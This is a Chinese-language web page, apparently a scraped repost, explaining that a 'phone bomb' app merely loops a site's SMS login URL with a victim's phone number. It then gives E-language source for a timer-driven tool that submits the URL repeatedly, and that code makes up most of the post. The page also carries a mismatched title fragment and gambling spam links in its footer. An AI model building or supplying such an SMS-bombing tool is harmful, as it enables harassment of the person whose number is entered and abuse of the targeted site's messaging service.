[让手机炸弹不在神秘] 满桌子啤酒自己喝图片

来源:手机 发布时间:2018-09-08 04:04:25 点击:
下载一个手机炸弹软件
随便输入一个手机号码然后选择次数之类的
利用WSockExpert_Cn.exe监听手机炸弹
得出/pages/user-newlogin.asp?number=13088170991
原来手机炸弹只不过是一个URL循环提交的工具而已
按照他的思路我也写了一个类的手机炸弹工具
开发语言:易语言
源代码如下:
.支持库 HtmlView
.支持库 iext

.程序集 窗口程序集1

.子程序 _按钮1_被单击

超文本浏览框1.地址 = “/pages/user-newlogin.asp?number=” + 编辑框1.内容
超级列表框1.插入表项 (, “message sannding successful!”, , , , )
时钟1.时钟周期 = 1000

.子程序 __启动窗口_创建完毕

按钮1.获取焦点 ()

.子程序 _按钮2_被单击

按钮1.禁止 = 真
时钟1.时钟周期 = 1215752191

.子程序 _按钮3_被单击

按钮1.禁止 = 假

.子程序 _时钟1_周期事件

_按钮1_被单击 ()


推荐访问:炸弹 不在 神秘 让手机炸弹不在神秘 手机骷髅炸弹 手机炸弹软件

Copyright @ 2013 - 2018 易啊教育网_免费学习教育网_自学.励志.成长! All Rights Reserved

易啊教育网_免费学习教育网_自学.励志.成长! 版权所有 湘ICP备11019447号-75

极速赛车直播网站 永发彩票计划群 北京极速赛车软件 山东11选5走势 上海11选5 山东11选5开奖 凤凰娱乐彩票计划群 玩极速赛车有什么技巧 山东11选5走势 极速赛车登陆